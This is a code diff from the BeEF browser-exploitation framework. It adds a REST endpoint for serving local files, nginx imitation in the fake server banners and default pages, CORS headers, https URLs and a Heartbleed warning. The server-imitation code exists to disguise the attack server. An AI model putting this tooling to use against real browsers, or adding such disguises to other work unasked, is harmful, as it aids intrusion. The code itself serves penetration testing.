+module BeEF
+  module Core
+    module Rest
+      class Server < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+        http_server = BeEF::Core::Server.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+
+        # @note Binds a local file to a specified path in BeEF's web server
+        post '/bind' do
+          request.body.rewind
+          begin
+            data = JSON.parse request.body.read
+            mount = data['mount']
+            local_file = data['local_file']
+            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
+            status 200
+          rescue => e
+            error 400
+          end
+        end
+      end
+    end
+  end
+end

core/main/router/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/router/router.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -66,6 +66,15 @@ module BeEF
                     "and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
                     "</ul>" +
                     "</TD></TR></TABLE></BODY></HTML>"
+              when "nginx"
+                #response body
+                "<html>\n"+
+                    "<head><title>404 Not Found</title></head>\n" +
+                    "<body bgcolor=\"white\">\n" +
+                    "<center><h1>404 Not Found</h1></center>\n" +
+                    "<hr><center>nginx</center>\n" +
+                    "</body>\n" +
+                    "</html>\n"
               else
                 "Not Found."
             end
@@ -81,21 +90,43 @@ module BeEF
             case type
               when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
 
               when "iis"
                 headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
+                        "Content-Type" => "text/html; charset=UTF-8"
+              when "nginx"
+                headers "Server" => "nginx",
                         "Content-Type" => "text/html"
               else
-                print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
+                print_error "You have an error in beef.http.web_server_imitation.type! Supported values are: apache, iis, nginx."
             end
           end
+
+          # @note If CORS is enabled, expose the appropriate headers
+          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          # and be able to handle requests with a JSON content-type
+          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET",
+                    "Access-Control-Allow-Headers" => "Content-Type"
+            halt 200
+          end
+
+          # @note If CORS is enabled, expose the appropriate headers
+          if config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+          end
         end
 
         # @note Default root page
         get "/" do
           if config.get("beef.http.web_server_imitation.enable")
+            bp = config.get "beef.http.web_ui_basepath"
             type = config.get("beef.http.web_server_imitation.type")
             case type
               when "apache"
@@ -191,7 +222,7 @@ module BeEF
                     "<h2>If you are the website administrator:</h2>" +
                     "<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
                     "<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers.  Thanks for using Apache and CentOS!</p>" +
-                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
+                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
                     "</div>" +
                     "</div>" +
                     "</div>" +
@@ -216,7 +247,7 @@ module BeEF
                     "<table>" +
                     "<tr>" +
                     "<td ID=tableProps width=70 valign=top align=center>" +
-                    "<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
+                    "<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
                     "<td ID=tablePropsWidth width=400>" +
                     "<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
                     "<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
@@ -236,6 +267,30 @@ module BeEF
                     "</table>" +
                     "</body>" +
                     "</html>"
+              when "nginx"
+                "<!DOCTYPE html>\n" +
+                    "<html>\n" +
+                    "<head>\n" +
+                    "<title>Welcome to nginx!</title>\n" +
+                    "<style>\n" +
+                    "    body {\n" +
+                    "        width: 35em;\n" +
+                    "        margin: 0 auto;\n" +
+                    "        font-family: Tahoma, Verdana, Arial, sans-serif;\n" +
+                    "    }\n" +
+                    "</style>\n" +
+                    "</head>\n" +
+                    "<body>\n" +
+                    "<h1>Welcome to nginx!</h1>\n" +
+                    "<p>If you see this page, the nginx web server is successfully installed and\n" +
+                    "working. Further configuration is required.</p>\n\n" +
+                    "<p>For online documentation and support please refer to\n" +
+                    "<a href=\"http://nginx.org/\">nginx.org</a>.<br/>\n" +
+                    "Commercial support is available at\n" +
+                    "<a href=\"http://nginx.com/\">nginx.com</a>.</p>\n\n" +
+                    "<p><em>Thank you for using nginx.</em></p>\n" +
+                    "</body>\n" +
+                    "</html>\n"
               else
                 ""
             end
@@ -245,4 +300,4 @@ module BeEF
       end
     end
   end
-end
+end

core/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -22,9 +22,10 @@ module BeEF
 
       def initialize
         @configuration = BeEF::Core::Configuration.instance
+        beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
         beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
         beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-        @url = "http://#{beef_host}:#{beef_port}"
+        @url = "#{beef_proto}://#{beef_host}:#{beef_port}"
         @root_dir = File.expand_path('../../../', __FILE__)
         @command_urls = {}
         @mounts = {}
@@ -41,10 +42,11 @@ module BeEF
             'beef_port'     => @configuration.get('beef.http.port'),
             'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns'      => @configuration.get('beef.http.dns'),
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
             'beef_hook'     => @configuration.get('beef.http.hook_file'),
             'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
-            'client_debug'  => @configuration.get("beef.client.debug")
+            'client_debug'  => @configuration.get("beef.client_debug")
         }
       end
 
@@ -106,6 +108,11 @@ module BeEF
               @rack_app)
 
           if @configuration.get('beef.http.https.enable') == true
+            openssl_version = OpenSSL::OPENSSL_VERSION
+            if openssl_version =~ / 1\.0\.1([a-f])/
+              print_warning "Warning: #{openssl_version} is vulnerable to Heartbleed (CVE-2014-0160)."
+              print_more "Upgrade OpenSSL to version 1.0.1g or newer."
+            end
             @http_server.ssl = true
             @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'),
                                       :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'),